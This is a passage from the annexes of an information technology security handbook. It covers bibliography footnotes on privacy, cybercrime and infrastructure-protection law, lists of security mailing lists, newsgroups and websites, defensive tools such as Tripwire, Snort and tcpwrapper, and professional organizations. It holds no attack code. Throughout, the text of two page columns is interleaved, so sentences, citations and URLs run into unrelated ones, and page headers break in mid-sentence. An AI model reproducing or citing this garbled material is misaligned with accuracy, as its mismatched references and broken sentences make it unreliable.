Grid Once source on privacy is the annual survey by EPIC and Computing Marketplace ­ A Primer of Key Legal Issues," Privacy International, "Privacy and Human Rights 2003" April 1, 2003. (Sept. 2003) http://www.privacyinternational.org/survey/phr2003/ Kellerman, Thomas, "Mobile Risk Management: E-finance in the Wireless Environment," The World Bank, May 2002. See also, the Global Privacy Report - a lengthy report on privacy conditions around the world, funded by the McCullagh, Declan, "Will Canada's ISPs become spies?" Japanese Ministry of Public Management, Home Affairs, CNET News.com, August 27, 2002. Posts and Telecommunications.,August 14, 2003 http://joi.ito.com/joiwiki/PrivacyReport Monetary Authority of Singapore ­ Technology Risk Management Guidelines for Financial Institutions ­ Links to anti-spam laws and organizations all around February 28, 2003. the world, as well as to articles in law journals analyzing the problem in more depth may be found at: Official Journal of the European Communities ­ Council http://www.spamlaws.com/ Resolution on a common approach and specific actions in the area of network and information security, January WIPO has published a summary of intellectual property 28, 2002. legislation in WIPO Member States, available at http://www.wipo.org/about- Official Journal of the European Communities ­ Council ip/en/ipworldwide/index.html. Resolution on the Implementation of the eEurope 2005 Action Plan, February 18, 2003. From the text footnotes for Part 4: OECD Guidelines for the Security of Information Systems http://www.usdoj.gov/04foia/privstat.htm and Networks ­ Towards a Culture of Security. A more extensive, although dated, discussion of legal Privacy Amendment Act of Australia (Private Sector) - issues in the U.S. can be found in Computer Crime: A Act 2000 Crimefighter's Handbook (O'Reilly). The book is out of print, but used copies are available. Information Technology Security Handbook HANDBOOK BIBLIOGRAPHY 367 The Global Internet Policy Initiative has a host of and Conflict Research, Swiss Federal Institute of resources on the full range of policy issues affecting ICT Technology (2002) http://www.isn.ethz.ch/crn. development: http://www.internetpolicy.net. For descriptions of how various other countries have The National Strategy to Secure Cyberspace [United responded to critical infrastructure protection, see States], February 2003 International Critical Information Infrastructure http://www.whitehouse.gov/pcipb/ Protection Handbook, edited by Andreas Wenger, Jan Metzger and Myriam Dunn, Center for Security Studies Office of Critical Infrastructure Protection and and Conflict Research, Swiss Federal Institute of Emergency Preparedness (OCIPEP) Technology (2002): http://www.isn.ethz.ch/crn. http://www.ocipep.gc.ca/home/index_e.asp. For ANNEX descriptions of how various other countries have United States Presidential Decision Directive 63: Critical responded to critical infrastructure protection, see Infrastructure Protection, May 22, 1998 "International Critical Information Infrastructure http://www.fas.org/irp/offdocs/pdd-63.htm. See also Protection Handbook," edited by Andreas Wenger, Jan PDD 62: http://www.fas.org/irp/offdocs/pdd-62.htm. TW Metzger and Myriam Dunn, Center for Security Studies O and Conflict Research, Swiss Federal Institute of E.O. 13228, Establishing the Office of Homeland Security Technology (2002) http://www.isn.ethz.ch/crn. and the Homeland Security Council, October 8, 2001, http://fas.org/irp/offdocs/eo/eo-13228.htm; E.O. The U.K.'s Home Office has created a National 13231, Critical Infrastructure Protection in the Infrastructure Security Coordination Centre (NISCC) to Information Age, October 16, 2001: coordinate critical infrastructure protection issues, http://www.ciao.gov/News/EOonCriticalInfrastrutureProt provide alerts and attack response assistance, and ection101601.html. facilitate public-private relationships to protect infrastructure. Within NISCC, there is a Computer The National Strategy to Secure Cyberspace, Feb. 14, Emergency Response Team, known as UNIRAS. An 2003, http://www.dhs.gov/interweb/assetlibrary/ Electronic Attack Response Group (EARG) is also within National_Cyberspace_Strategy.pdf. NISCC to provide assistance to critical infrastructure organizations and government departments that suffer The National Strategy to Secure Cyberspace was an attack. UNIRAS will provide an early warning and supplemented by The National Strategy for the Physical alert service to all UK businesses. The NISCC website Protection of Critical Infrastructures and Key Assets, (http://www.niscc.gov.uk) provides detailed information released March 4, 2003, http://www.dhs.gov/interweb/ on the British government's approach. assetlibrary/Physical_Strategy.pdf. Both of these documents are implementing components of The Under Australian law, Executive Agencies are non- National Strategy for Homeland Security, issued by the statutory bodies established by the Governor-General White House on July 16, 2002. when a degree of independence within the governmental structure is needed and when the functions of the European Commission, Proposal for a Regulation of the agency require a government-wide approach. The head European Parliament and of the Council Establishing the of an Executive Agency is appointed by, and directly European Network and Information Security Agency, Feb. accountable to, a Minister, in this case the Minister for 11, 2003, COM(2003) 63 final, 2003/0032 (COD): Communications, Information Technology and the Arts. http://europa.eu.int/information_society/eeurope/actio See: http://www.noie.gov.au/Projects/confidence/ n_plan/safe/documents/nisa_en.pdf Protecting/nat_agenda.htm. Council resolution of 28 Jan. 2002; European International Critical Information Infrastructure Commission, Communication from the Commission to the Protection Handbook, edited by Andreas Wenger, Jan Council, the European Parliament, the European Economic Metzger and Myriam Dunn, Center for Security Studies And Social Committee and the Committee of the Regions 368 HANDBOOK BIBLIOGRAPHY - Network and Information Security: Proposal for a Security of Information Systems to the information European Policy Approach, June 6, 2001, COM (2001) security standards adopted by non-governmental 298 final, http://europa.eu.int/information_ standards bodies. See generally, Michael Nugent, It Can't society/eeurope/news_library/new_documents/ Happen Here, Wall Street Technology Association, Ticker, index_en.htm A Technology Magazine For Industry Profession (2003), http://www.wsta.org/publications/articles/ European Commission, Communication from the 0402_article03.html Commission to the Council, the European Parliament, the Economic and Social Committee and the Committee Carol A. Siegel, Ty R. Sagalow, Paul Serritella, Cyber-Risk- on the Regions Creating a Safer Information Society by Management Technical and Insurance Controls for Improving the Security of Information Infrastructures Enterprise-Level Security, Security Management Practices, and Combating Computer-related Crime, Jan. 26, 2001, pg. 42, (September/October 2002). http://www.gsu.edu/ COM(20000) 890 final, http://europa.eu.int/ISPO/eif/ ~accrss/Security_and_Business_Risk.pdf. InternetPoliciesSite/Crime/CrimeCommEN.html NIST's Computer Security Resource Center (CSRC) Homeland Security Act, publishes information on a broad range of security http://www.whitehouse.gov/deptofhomeland/analysis/ topics, including cryptographic standards and applications, security testing, security research, system Federal Information Security Management Act, Title III certification and accreditation guidelines, return on of E-Government Act of 2002, Pub. Law 107-347, security investments, small business computer security, http://csrc.nist.gov/policies/FISMA-final.pdf. and federal agency security practices. http://csrc.nist.gov/. NIST publications are available at Federal Information Security Management Act, Title III http://csrc.nist.gov/publications/index.html. of E-Government Act of 2002, Pub. Law 107-347, http://csrc.nist.gov/policies/FISMA-final.pdf. National Security Agency, Security Recommendation Guides, http://nsa1.www.conxion.com/. Thomas J. Smedinghoff, "The Developing U.S. Legal Standard for Cyber-security," Baker & McKenzie, Chicago, CERT/Coordination Center, Software Engineering http://www.bmck.com/ecommerce/us%20cyber- Institute, Carnegie Mellon University, security%20standards.pdf; http://www.cert.org/. In the United States, the Securities and Exchange European Commission, Communication from the Commission has brought actions against corporations Commission to the Council, the European Parliament, the that insufficiently protected their computer systems European Economic And Social Committee and the from unauthorized access. See SEC v. National Business Committee of the Regions - Network and Information Communications Corp., SEC Litig. Release No. 11223, Security: Proposal for a European Policy Approach, June Sept. 19, 1986, SEC Litig. Release No. 11229, Sept. 26, 6, 2001, COM(2001) 298 final, 1986. In the Matter of Material Sciences Corporation, SEC http://europa.eu.int/information_society/eeurope/news Litig. Release No. 41930, Sept. 28, 1999. _library/new_documents/index_en.htm. Sarbanes-Oxley Act of 2002, Pub. Law 107-204. Proposal for a Regulation of the European Parliament and of the Council Establishing the European Network and http://www.aicps.org; http://www.isaca.org. Information Security Agency, Commission of the European Communities, Feb. 11, 2003, COM(2003) 63 As is made clear throughout this handbook, there is a final, 2003/0032 (COD), http://europa.eu.int/ growing body widely accepted computer security information_society/eeurope/action_plan/safe/ standards, ranging from the Organization for Economic documents/nisa_en.pdf. Cooperation and Development (OECD) Guidelines for the Information Technology Security Handbook HANDBOOK BIBLIOGRAPHY 369 "Protecting Developing Economies from Cyber Attack ­ cybercrime and cyber-security area. Effective measures to Assistance to Build Regional Cyber-security prevent and control computer-related crime, Preparedness," APEC Media Release, Mar. 18, 2003, E/CN.15/2002/8, Report of the Secretary-General, http://www.apecsec.org.sg/whatsnew/press/PressRel_Pr United Nations, Economic and Social Council, otectgFromCyberAttack_180303.html. Commission on Crime Prevention and Criminal Justice, Eleventh Session, Vienna, Apr. 16-25, 2002, http:// http://www.ncs.gov/NSTAC/attf.html www.unodc.org/pdf/crime/commissions/11comm/8e.pdf. The American Bar Association's Privacy & Computer Gramm-Leach Bliley Act, 15 USC, Subchapter 1, § 6801. Crime Committee has published a detailed report covering cybercrime in depth. Jody R. Westby, ed., "Appendix B to Part 570--Interagency Guidelines ANNEX International Guide to Combating Cybercrime, American Establishing Standards for Safeguarding Customer Bar Association, Section of Science & Technology Law, Information," Part III, http://www.occ.treas.gov/ Privacy & Computer Crime Committee, 2003, fr/fedregister/66fr8616.htm. http://www.abanet.org/abapubs/books/cybercrime/. TW "Financial Institutions and Customer Data: Complying O UN General Assembly, Resolution 55/63, Combating the with the Safeguards Rule," http://www.ftc.gov/bcp/ criminal misuse of information technologies, Dec. 4, conline/pubs/buspubs/safeguards.htm 2000, http://www.nvk2000.ru/apec/documents/ International_Agreements/55-63_English.pdf Standards for Safeguarding Customer Information, 67 Fed. Reg. 36484-94, May 23, 2000, (codified at 16 UN General Assembly, Resolution 56/121, Combating the C.F.R. Part 314), http://www.ftc.gov/os/2002/05/ criminal misuse of information technologies, Jan. 23, 67fr36585.pdf. 2002, http://ods-dds-ny.un.org/doc/UNDOC/GEN/N01/ 482/04/PDF/N0148204.pdf?OpenElement. Technology Risk Management Guidelines for Financial Institutions, Monetary Authority of Singapore, Draft Nov. The treaty, ETS no. 185, is online at 11, 2002, http://www.mas.gov.sg/display.cfm?id= http://conventions.coe.int/treaty/EN/cadreprincipal.htm 94D063CD-5EB6-4636-82B5A725F9F6E9F5. along with an extensive Explanatory Report. 45 CFR §160, 162, 164; Eighth United Nations Congress on the Prevention of http://www.cms.hhs.gov/hipaa/hipaa2/regulations/ Crime and the Treatment of Offenders, Havana, Aug. 27- security/default.asp Sept. 7, 1990, report prepared by the Secretariat, UN publication, Sales No. E.91.IV.2, chap I. For the text of HIPAA, 42 U.S.C. Section 1320d-2(d)(2). these recommendations, see United Nations Commission on Crime Prevention and Criminal Justice, Report on the Linda A. Malek and Brian R. Krex, "HIPAA's security rule Eighth Session, Apr. 27-May 6, 1999, E/CN.15/1999/12, becomes effective 2005," The National Law Journal, Mar. http://www.un.org/documents/ecosoc/docs/1999/e1999 31, 2003 at B14. -30.htm. http://europa.eu.int/comm/internal_market/privacy/ UN, International Review of Criminal Policy - United law_en.htm. Nations Manual on the Prevention and Control of Computer-Related Crime, http://www.uncjin.org/ Directive 2002/58/EC of the European Parliament and of Documents/EighthCongress.html. the Council of 12 July 2002 concerning the processing of personal data and the protection of privacy in the Report of UN Economic and Social Council's Commission electronic communications sector (Directive on privacy on Crime Prevention and Criminal Justice effectively and electronic communications), Article 4(1), Official summarizes UN and other international work in the Journal L 201/37, July 31, 2002, at 37-47 (replacing EU 370 HANDBOOK BIBLIOGRAPHY Directive 97/66/EC), http://europa.eu.int/smartapi/ cgi/sga_doc?smartapi!celexapi!prod!CELEXnumdoc&lg=en &numdoc=32002L0058&model=guichett. Security Breach Information Act (SB 1386), added to the California Civil Code as Section 1798.29; Keith Poulsen, "California disclosure law has national reach," SecurityFocus Online, Jan. 6, 2003, http:// online.securityfocus.com/news/1984. Other disclosure proposals have been put forth in the U.S. See [Michael Vatis, Testimony before the House Government Reform Committee, April 8, 2003; Sen. Bennett's proposal. PART 5 http://news.cnet.com/news/0-1005-200-4523277.html http://www.wired.com/news/technology/0,1282,34496, 00.html http://www.microsoft.com/technet/security/bulletin/ MS01-017.asp Forum of Incident Response and Security Teams, the worldwide consortium of major computer incident response groups. Visit http://www.first.org for more information. ISS reported a security problem to 11 vendors in December 1999, then released the information about the vulnerability to the press in February 2000. For further information, see http://www.cnn.com/2000/TECH/ computing/02/04/shop.glitch.idg "Dos and Don'ts of Client Authentication on the Web," USENIX and MIT Technical Report 818, by Kevin Fu, Emil Sit, Kendra Smith, and Nick Feamster Information Technology Security Handbook ELECTRONIC RESOURCES 371 ANNEX 3. A Big Problem With Mailing Lists ELECTRONIC RESOURCES The problem with all these lists is that you can easily There is a certain irony in trying to include a overwhelm yourself. If you are on lists from two comprehensive list of electronic resources in a printed response teams, four vendors, and another half-dozen document. Electronic resources such as Web pages, general-purpose lists, you may find yourself filtering news-groups, and mailing lists are updated on an hourly several hundred messages a day whenever a new general basis; new releases of computer programs can be vulnerability is discovered. At the same time, you don't published every few weeks. want to unsubscribe from these lists, because you might then miss the timely announcement of a special-case fix We thus present the following electronic resources with the for your own systems. understanding that this list necessarily cannot be complete nor completely up to date. What we hope, instead, is that One method that we have seen others use with some it is useful. By reading it, we hope that you will gain success is to split the mailing lists up among a group of insight into places to look for future developments in administrators. Each person gets one or two lists to computer security. Along the way, you may find some monitor, with particularly useful messages then information you can put to immediate use. redistributed to the entire group. Be certain to arrange coverage of these lists if someone leaves or goes on Mailing Lists vacation, however! There are many mailing lists that cover security-related Another approach is to feed these messages into Usenet ANNEX material. We describe a few of the major ones here. newsgroups you create locally especially for this However, this is not to imply that only these lists are purpose. This strategy allows you to read the messages worthy of mention! There may well be other lists of using an advanced newsreader that will allow you to kill THREE which we are unaware, and many of the lesser-known message chains or trigger on keywords. It may also help lists often have a higher volume of good information. provide an archiving mechanism to allow you to keep several days or weeks (or more) of the messages. Never place blind faith in anything you read in a mailing list, especially if the list is unmoderated. There Finally, most security mailing lists offer the option of are a number of self-styled experts on the net who will subscribing to a daily digest of the list. Digest not hesitate to volunteer their views, whether subscribers usually receive a single message each day knowledgeable or not. Usually their advice is benign, that contains all of the day's messages. Managing these but sometimes it is quite dangerous. There may also be digests can be easier than sorting through each people who are providing bad advice on purpose, as a individual message as they arrive. Of course, you may form of vandalism. And certainly there are times where learn about new vulnerabilities several hours later than the real experts make a mistake or two in what they other system administrators -- or attackers. recommend in an off-hand note posted to the net. Response Teams and Vendors There are some real experts on these lists who are (happily) willing to share their knowledge with the Many of the incident response teams (listed in Appendix community, and their contributions make the Internet a E) have mailing lists for their advisories and alerts. If better place. However, keep in mind that simply because you can be classified as one of their constituents, you you read it on the network does not mean that the should contact the appropriate team(s) to be placed on information is correct for your system or environment, their mailing lists. does not mean that it has been carefully thought out, does not mean that it matches your site policy, and Many vendors also have mailing lists for updates and most certainly does not mean that it will help your advisories concerning their products. These include security. Always evaluate carefully the information you computer vendors, firewall vendors, and vendors of receive before acting on it. security software (including some freeware and 372 ELECTRONIC RESOURCES shareware products). You may wish to contact your majordomo@cert.org. Put "subscribe cert-advisory" in vendors to see if they have such lists, and if so, join. To the message body. subscribe to Microsoft's Security Notification Service mailing list, for example, visit the Microsoft Profile Archived past advisories are available at Center at http://register.microsoft.com/regsys/pic.asp http://www.cert.org/nav/alerts.html. and register. Computer underground digest Major Mailing Lists A curious mixture of postings on privacy, security, law, and the computer underground fill this list. Despite the These are some of the major mailing lists. name, this list was not a digest of material by the "underground"--it contained information about the Bugtraq computing milieu. Unfortunately, it stopped publishing Bugtraq is a full-disclosure computer security mailing in 2000, and it is unclear if the list will ever resume. list. This list features detailed discussion of UNIX This list was available as the newsgroup security holes: what they are, how to exploit them, and comp.society.cu-digest on the Usenet; the newsgroup what to do to fix them. This list is not intended to be was the preferred means of distribution. The list is about cracking systems or exploiting their vulnerabilities archived at numerous places around the Internet, (although that is known to be the intent of some of the including its home page: subscribers). It is, instead, about defining, recognizing, http://sun.soci.niu.edu/~cudigest/ and preventing use of security holes and risks. To subscribe, sign up at http://www.securityfocus.com. Note Firewalls that we have seen some incredibly incorrect and The Firewalls mailing list, which is hosted by the downright bad advice posted to this list. Individuals Internet Software Consortium, is a primary forum for who attempt to point out errors or corrections are often folks on the Internet who want to discuss the design, roundly flamed as being "anti-disclosure." Post to this construction, operation, maintenance, and philosophy of list with caution if you are the timid sort. Internet firewall security systems. To subscribe, visit http://www.isc.org/services/public/lists/firewalls.html . SecurityFocus also runs several other mailing lists that cover areas of security (such as IDS, honeypots, or The Firewalls mailing list is usually high volume viruses) or specific flavors of Unix (such as Linux or Sun (sometimes more than 100 messages per day, although systems). A particularly interesting list is "incidents" usually it is only several dozen per day). To which is for reporting actual attacks and break-ins. accommodate subscribers who don't want their SecurityFocus is owned by the Symantec Corporation mailboxes flooded with lots of separate messages from Fire-walls, a digested version of the list is also NTBugtraq available, and the list is archived on the web site. A full-disclosure computer security mailing list for Microsoft Windows NT-based systems (including Windows Firewall-Wizards 2000 and XP). Non NT-based releases are off-topic for The firewall-wizards mailing list is a moderated list this list. In other ways, it resembles the Bugtraq list. focused not only on the design and implementation of Subscribe at http://www.ntbugtraq.com. firewalls but also other network security topics. You can subscribe (or browse the archives) at CERT-advisory http://honor.icsalabs.com/mailman/listinfo/ New CERT/CC advisories of security flaws and fixes for firewall-wizards. Internet systems are posted to this list. This list makes somewhat boring reading; often the advisories are so RISKS watered down that you cannot easily figure out what is RISKS is officially known as the ACM Forum on Risks to actually being described. Nevertheless, the list does the Public in the Use of Computers and Related Systems. have its bright spots. Send subscription requests to It's a moderated forum for discussion of risks to society Information Technology Security Handbook ELECTRONIC RESOURCES 373 from computers and computerization. RISKS is also comp.protocols.tcp-ip distributed as the comp.risks Usenet newsgroup, and TCP/IP internals, including security this is the preferred method of subscription. If you don't get Usenet (and don't want to read it via comp.unix.admin http://groups.google.com), you can send email UNIX system administration, including security subscription requests to RISKS-Request@csl.sri.com with the word "subscribe" in the body. sci.crypt Discussions about cryptology research and application Back issues are available through Google (as above) or from http://www.risks.org sci.crypt.research (moderated) Discussions about cryptology research SANS Security Alert Consensus Security Alert Consensus is a weekly digest of alerts and comp.risks (moderated) announcements from several other security mailing lists As described above and vendors. Subscriptions can be customized to include only those operating systems for which you are microsoft.public.security, responsible. Subscribe at http://www.sans.org. microsoft.public.win2000.security, microsoft.public.windowsxp.security_admin Usenet Groups Microsoft hosts dozens of Usenet groups for its operating systems and applications, include several There are several Usenet newsgroups that you might devoted specifically to security. ANNEX find to be interesting sources of information on network security and related topics. However, the unmoderated WWW Sites lists are the same as other unmoderated groups on the THREE Usenet: repositories of material that is often off-topic, There are literally thousands of WWW pages with repetitive, and incorrect. Our warning about material pointers to other information. Some pages are found in mailing lists, expressed earlier, applies doubly comprehensive, and others are fairly narrow in focus. to newsgroups. The ones we list here provide a good starting point for any browsing you might do. You will find most of the comp.security.announce (moderated) other useful directories linked into one or more of these Computer security announcements, including new pages, and you can then build your own set of CERT/CC advisories "bookmarks." comp.security.unix CIAC UNIX security The staff of the CIAC keep a good archive of tools and documents available on their site. This archive includes comp.security.misc copies of their notes and advisories, and some locally Miscellaneous computer and network security developed software: http://ciac.llnl.gov comp.security.firewalls Information about firewalls CERIAS CERIAS (Center for Education and Research in comp.virus (moderated) Information Assurance and Security), the successor to Information on computer viruses and related topics COAST (Computer Operations, Audit, and Security Technology) is an inter-disciplinary center in comp.admin.policy information security research and education at Purdue Computer administrative policy issues, including security University. It functions with close ties to researchers and engineers in major companies and government 374 ELECTRONIC RESOURCES agencies. CERIAS focuses on real-world research needs Insecure.org and limitations. Home of the nmap portscanning tool, the Insecure.org web site links to archives of many important mailing From a purely historical perspective, this represents lists and other security information: what may be the oldest, and longest-running Internet http://www.insecure.org archive of security tools and reference materials. Created in 1989 as an ftp-only site, the archive started NIH as a collection of anti-virus tools and gradually The WWW index page at NIH provides a large set of expanded to include scanners, firewalls, and documents pointers to internal collections and other archives: of all kinds. The site transitioned through gopher and http://www.alw.nih.gov/Security/ WWW servers, and from a personal archive (Spafford's) to the COAST Laboratory archive, to the current CERIAS Software Resources archive. For its first decade the site was generally believed to be the largest archive of security material This appendix describes some of the tools and packages on the Internet. available on the Internet that you might find useful in maintaining security at your site. Although this software Over the last few years, the archive and hotlist have is (or was) freely available, some of it is restricted in diverged somewhat, and fewer items are currently stored various ways by the authors (e.g., it may not be there than before. (Many of the commercial sites have permitted to be used for commercial purposes or be resources to pay a staff to maintain more comprehensive included on a CD-ROM, etc.) or by the U.S. government archives.) Nonetheless, the current archive contains (e.g., if it contains cryptography, there may be many items of historical interest, a large collection of constraints on export or use in certain locales). useful tools and documents, including items not carried Carefully read the documentation files that are elsewhere, and items that are produced by CERIAS and distributed with the packages. If you have any doubt CERIAS partners. There are also extensive lists of about appropriate use restrictions, contact the author(s) pointers to organizations and resources. directly. http://www.cerias.purdue.edu/infosec/ Although we have used most of the software listed here, ftp://ftp.cerias.purdue.edu we can't take responsibility for ensuring that the copy you get will work properly and won't cause any damage FIRST to your system. As with any software, test it before you The FIRST (Forum of Incident Response and Security use it! Teams) Secretariat maintains a large archive of material, including pointers to WWW pages for other FIRST teams: Some software distributions carry an external PGP http://www.first.org signature. This signature helps you verify that the distribution you receive is the one packaged by the NIST CSRC author. It does not provide any guarantee about the The National Institute of Standards and Technology's safety or correctness of the software, however. Computer Security Division maintains a comprehensive archive of documents and tools. This is a trusted, useful Because of the additional confidence that a digital site for documentation, standards, and software. signature can add to software distributed over the http://csrc.nist.gov/index.html Internet, we strongly encourage authors to take the additional step of including a stand-alone signature. We also encourage users who download software to check several other sources if they download a package without a signature. Information Technology Security Handbook ELECTRONIC RESOURCES 375 Crossplatform Tools server software (such as web servers). It also provides a command line tool for generating cryptographic Kerberos certificate requests, certificates, signatures, and random Kerberos is a secure network authentication system that numbers. OpenSSL is available from: is based upon private key cryptography. The Kerberos http://www.openssl.org source code and papers are available from the Massachusetts Institute of Technology. Contact: MIT Software Center Snort W32-300 Snort is a powerful open source packet sniffer and 20 Carlton Street network intrusion detection system. Its IDS ruleset is Cambridge, MA 02139 regularly updated, enabling it to parse the TCP/IP (617) 253-7686 packets that it monitors in real time, and report suspicious traffic. Get Snort from: You can use anonymous FTP to transfer files over the http://www.snort.org Internet from: ftp://athena-dist.mit.edu/pub/kerberos Kerberos is integrated into Microsoft Windows 2000 and Tripwire later releases. Tripwire, written by Gene H. Kim and Gene Spafford of Purdue University, is a file integrity checker, a utility nmap that compares a designated set of files and directories nmap is the port scanner of choice for both attackers against information stored in a previously generated and defenders. It can perform a wide variety of TCP, database. Added or deleted files are flagged and ANNEX UDP, and ICMP scans (including various "stealth scans" reported, as are any files that have changed from their that attackers might use to disguise their activities), previously recorded state in the database. Run Tripwire and has a sophisticated ability to "fingerprint" against system files on a regular basis. If you do so, the THREE operating systems and determine their vendor and program will spot any file changes when it next runs, version remotely. It is available from: giving system administrators information to enact http://www.insecure.org damage-control measures immediately. OpenSSH You can get the freeware version of Tripwire from: OpenSSH is a free software implementation of the http://www.tripwire.com/downloads/ Secure Shell protocol (versions 1 and 2) for cryptographically-secured remote terminal emulation, Unix Tools command execution, and file transfer. It is developed and maintained by the OpenBSD project, but the chrootuid "portable" version compiles and runs on most Unix The chrootuid daemon, by Wietse Venema, simplifies the systems and several other operating systems. There are task of running a network service at a low privilege also several good free software SSH clients for Windows, level and with restricted file system access. The program including PuTTY. Disable the telnet daemon before you can be used to run WWW and other network daemons in connect your system to a network; install OpenSSH (or a minimal environment: the daemons have access only another SSH server) if you need to be able to connect to their own directory tree and run with an unprivileged to your system over the network. You can get OpenSSH at: user ID. This arrangement greatly reduces the impact of http://www.openssh.org possible security problems in daemon software. OpenSSL You can get chrootuid from: OpenSSL is a free software implementation of the Secure ftp://ftp.porcupine.org/pub/security/index.html Sockets Layer (versions 2 and 3) and Transport Layer ftp://ftp.cerias.purdue.edu/pub/tools/unix/sysutils/ Security (version 1) protocols. It provides libraries for chrootuid/ these protocols that are commonly required by other 376 ELECTRONIC RESOURCES portmap Tiger The portmap daemon, written by Wietse Venema, is a Tiger, originally written by Doug Schales of Texas A&M replacement program for Sun Microsystem's portmapper University (TAMU), is a set of scripts that scan a UNIX program. Venema's portmap daemon offers access system looking for security problems. Tiger was control and logging features that are not found in Sun's originally developed to provide a check of the UNIX version of the program. It also comes with the source systems on the A&M campus that users wanted to be code, allowing you to inspect the code for problems or able to access off-campus. Before the packet filtering in modify it with your own additional features, if necessary. the firewall would be modified to allow off-campus access to the system, the system had to pass the Tiger You can get portmap from: checks. Tiger was dormant from 1994-1999, but is once ftp://ftp.porcupine.org/pub/security/index.html again being actively maintained and updated. ftp://ftp.cerias.purdue.edu/pub/tools/unix/netutils/port map/ You can get Tiger from: http://www.tigersecurity.org Portsentry The portsentry program is a proactive defense against trimlog portscans that may precede an attack. portsentry listens David Curry's trimlog is designed to help you to manage on a unused TCP/IP ports and takes action when log files. It reads a configuration file to determine outsiders attempt to establish connections to one or which files to trim, how to trim them, how much they more monitored ports. Actions can include adding the should be trimmed, and so on. The program helps keep scanning host to /etc/hosts.deny, adding the scanning your logs from growing until they consume all available host to a packet-filtering firewall, or running other disk space. arbitrary commands. portsentry is available at: http://sourceforge.net/projects/sentrytools/ You can get trimlog from: ftp://ftp.cerias.purdue.edu/pub/tools/unix/logutils/ Swatch trimlog/ Swatch, by Todd Atkins of Stanford University, is the Simple Watcher. It monitors log files created by syslog, wuarchive ftpd and allows an administrator to take specific actions (such The wuarchive FTP daemon offers many features and as sending an email warning, paging someone, etc.) in security enhancements, such as perdirectory message response to logged events and patterns of events. files shown to any user who enters the directory, limits on number of simultaneous users, and improved logging You can get Swatch from: and access control. These enhancements are specifically http://www.oit.ucsb.edu/~eta/swatch/ designed to support anonymous FTP. ftp://ftp.cerias.purdue.edu/pub/tools/unix/logutils/swatch You can get the daemon from: tcpwrapper http://www.wu-ftpd.org The tcpwrapper is a system written by Wietse Venema that allows you to monitor and filter incoming requests for servers started by inetd. You can use it to selectively deny access to your sites from other hosts on the Internet, or, alternatively, to selectively allow access. You can get tcpwrapper from: ftp://ftp.porcupine.org/pub/security/index.html ftp://ftp.cerias.purdue.edu/pub/tools/unix/netutils/ tcp_wrappers/ Information Technology Security Handbook ELECTRONIC RESOURCES 377 Windows Tools Antivirus software There are many fine antivirus products produced by companies that regularly issue updated virus lists. It is less important which antivirus product you choose than that you choose one, and use it consistently. The best products offer real-time antivirus protection as a background service, rather than just virus scanning on demand. Microsoft Baseline Security Analyzer The Microsoft Baseline Security Analyzer (BSA) is a security-checking application for Windows NT 4 and later systems. It performs a variety of checks on the local system or on remote systems under your administrative control, including checking for updated security patches, password quality, filesystem configuration, auditing, and application-specific checks for IIS and SQL Server. Highly recommended as the first tests to run ­ if it can't pass this, you've got problems. ANNEX Get it from: http://www.microsoft.com/technet/security/tools/Tools/ THREE mbsahome.asp Microsoft IIS Lockdown Wizard IIS, the Windows web server, has repeatedly been the source of system compromises. If you don't choose to replace it completely with Apache (http://httpd .apache.org) or another web server, at minimum you should run this Wizard, which disables unnecessary components and tightens security of the IIS installation and configuration. Get it from: http://www.microsoft.com/Downloads/Release.asp? ReleaseID=43955 378 ORGANIZATIONS ANNEX 4. World Wide Web page is especially comprehensive and ORGANIZATIONS well organized: Here we have collected information on a few useful http://www.acm.org organizations you can contact for more information and additional assistance. American Society for Industrial Security (ASIS) Professional Organizations The American Society for Industrial Security is a professional organization for those working in the You may find the following organizations helpful. The security field. ASIS has been in existence for 40 years first few provide newsletters, training, and conferences. and has 32,000 members worldwide as of 2002. Its 25 FIRST organizations may be able to provide assistance in standing committees focus on particular areas of an emergency. security, including computer security. The group publishes a monthly magazine devoted to security and Association for Computing Machinery (ACM) loss management. ASIS also sponsors meetings and other group activities. Membership is open only to individuals The Association for Computing Machinery is the oldest involved with security at a management level. of the computer science professional organizations. It publishes many scholarly journals and annually sponsors More information may be obtained from dozens of research and community-oriented conferences http://www.asisonline.org or: and workshops. The ACM also is involved with issues of education, professional development, and scientific American Society for Industrial Security progress. It has a number of special interest groups 1625 Prince Street (SIGs) that are concerned with security and computer Alexandria, Virginia 22314-2818 use. These include the SIGs on Security, Audit and +1-703-519-6200 Control; the SIG on Operating Systems; the SIG on http://www.asisonline.org/ Computers and Society; and the SIG on Software Engineering. www.cisecurity.org The ACM may be contacted at: Cisecurity is a useful source of security information, ACM Headquarters checklists, and tools for Unix and Windows. One Astor Plaza 1515 Broadway Computer Security Institute (CSI) 17th Floor New York, New York 10036-5701 The Computer Security Institute was established in 1974 +1-212-869-7440 as a multiservice organization dedicated to helping its members safeguard their electronic data processing ACM has a US Public policy committee that comments resources. CSI sponsors workshops and conferences on on pending legislation affecting security, privacy, and security, publishes a research journal and a newsletter usability. Many of the items they are concerned with devoted to computer security, and serves as a should also be of concern to those interested in security. clearinghouse for security information. The Institute offers many other services to members and the http://www.acm.org/usacm/ community on a for-profit basis. Of particular use is an annual Computer Security Buyer's Guide that lists sources The ACM has an extensive set of electronic resources, of software, literature, and security consulting. including information on its conferences and special You may contact CSI at http://www.gocsi.com or: interest groups. The information provided through the Information Technology Security Handbook ORGANIZATIONS 379 Computer Security Institute Information Systems Security Association (ISSA) 600 Harrison Street San Francisco, CA 94107 The ISSA is an international organization of information +1-415-947-6320 security professionals and practitioners. It provides education forums, publications, and peer interaction Electronic Frontier Foundation (EFF) opportunities that enhance the knowledge, skill, and professional growth of its members. They publish a EFF advocates and litigates on issues related to civil magazine and sponsor conferences and workshops. liberties and freedom on the Internet. Although its Chapters are present throughout the U.S. and around concerns are considerably broader than security, EFF the world. maintains an interesting archive of privacy- and security-related documents at http://www.eff.org/ For more information about ISSA, contact: Privacy. EFF can be contacted through that web site, or: ISSA Headquarters 7044 S. 13th Street Electronic Frontier Foundation Oak Creek, WI 53154 454 Shotwell Street +1-414-768-8000 San Francisco, CA 94110-1914 +1-800-370-ISSA +1-415-436-9333 ISSA has a WWW page at: Electronic Privacy Information Center (EPIC) http://www.issa.org EPIC is a public interest research center that studies Information Systems Audit and Control Association electronic privacy issues. EPIC litigates and advocates (ISACA) for privacy and civil liberties. EPIC's web site is http://www.epic.org, or it can be contacted at: The ISACA is an international organization of information security management, audit and consulting 1718 Connecticut Avenue, NW, Suite 200 professionals and practitioners. It provides education Washington, DC 20009 forums, publications, professional certification and peer +1-202-483-1140 interaction opportunities that enhance the knowledge, Email: info@epic.org skill, and professional growth of its members. They publish a magazine and sponsor research, conferences ANNEX High Technology Crimes Investigation Association and workshops. Chapters are present 